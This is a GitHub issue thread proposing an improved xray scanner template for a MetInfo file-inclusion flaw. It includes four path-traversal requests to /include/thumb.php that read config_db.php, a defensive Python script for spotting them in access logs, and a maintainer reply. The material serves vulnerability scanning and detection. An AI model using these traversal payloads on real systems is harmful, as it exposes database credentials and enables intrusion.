
The POC for metinfo-lfi-cnvd-2018-13393 can be improved

Open ghost opened this issue 4 years ago • 1 comments

The file is at: https://github.com/chaitin/xray/blob/master/pocs/metinfo-lfi-cnvd-2018-13393.yml The key part of the improved POC is:

groups:
  poc1:
    - method: GET
      path: /include/thumb.php?dir=..././http..././config/config_db.php
      expression:
        response.status == 200 && response.body.bcontains(b"con_db_host")
  poc2:
    - method: GET
      path: /include/thumb.php?dir=.....///http/.....///config/config_db.php
      expression:
        response.status == 200 && response.body.bcontains(b"con_db_host")
  poc3:
    - method: GET
      path: /include/thumb.php?dir=http/.....///.....///config/config_db.php
      expression:
        response.status == 200 && response.body.bcontains(b"con_db_host")
  poc4:
    - method: GET
      path: /include/thumb.php?dir=http\\..\\..\\config\\config_db.php
      expression:
        response.status == 200 && response.body.bcontains(b"con_db_host")

ghost avatar Feb 02 '21 06:02 ghost
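
For defenders, the four request shapes in the post above can be matched in web server access logs. The following is an added example, not code from the issue or from the xray project; it assumes the Apache/nginx combined log format, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

THUMB_ENDPOINT = "/include/thumb.php"  # endpoint targeted by all four requests
# Assumed log layout: Apache/nginx "combined" format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def suspicious_thumb_request(target: str) -> bool:
    """True if a thumb.php request carries a traversal-style `dir` value."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(THUMB_ENDPOINT):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get("dir", []):
        # parse_qs decodes once; decode again to catch double percent-encoding.
        decoded = unquote(value).lower()
        # Heuristics: parent-directory dots, backslash separators, or a
        # thumbnail endpoint being asked for a PHP file.
        if ".." in decoded or "\\" in decoded or decoded.endswith(".php"):
            return True
    return False

def flag_log_lines(lines):
    """Return (client, status, target) for each suspicious request line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and suspicious_thumb_request(m.group(2)):
            hits.append((m.group(1), int(m.group(3)), m.group(2)))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Feb/2021:06:02:11 +0000] "GET /include/thumb.php'
    '?dir=..././http..././config/config_db.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [02/Feb/2021:06:02:12 +0000] "GET /include/thumb.php'
    '?dir=http%5C..%5C..%5Cconfig%5Cconfig_db.php HTTP/1.1" 200 512',
    '198.51.100.4 - - [02/Feb/2021:06:03:40 +0000] "GET /include/thumb.php'
    '?dir=upload/201801/banner.jpg HTTP/1.1" 200 20480',
    '198.51.100.4 - - [02/Feb/2021:06:03:41 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, status, target in flag_log_lines(SAMPLE_LOG):
        # A 200 status is the case the POC expressions treat as a hit.
        print(client, status, target)
```

A flagged request that returned 200 is worth checking against the response size or body, since the POC expressions only count a response containing `con_db_host` as a hit.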

Thank you for the feedback. We will strengthen the rules for this POC in a follow-up.

mashiro01 avatar Dec 22 '22 10:12 mashiro01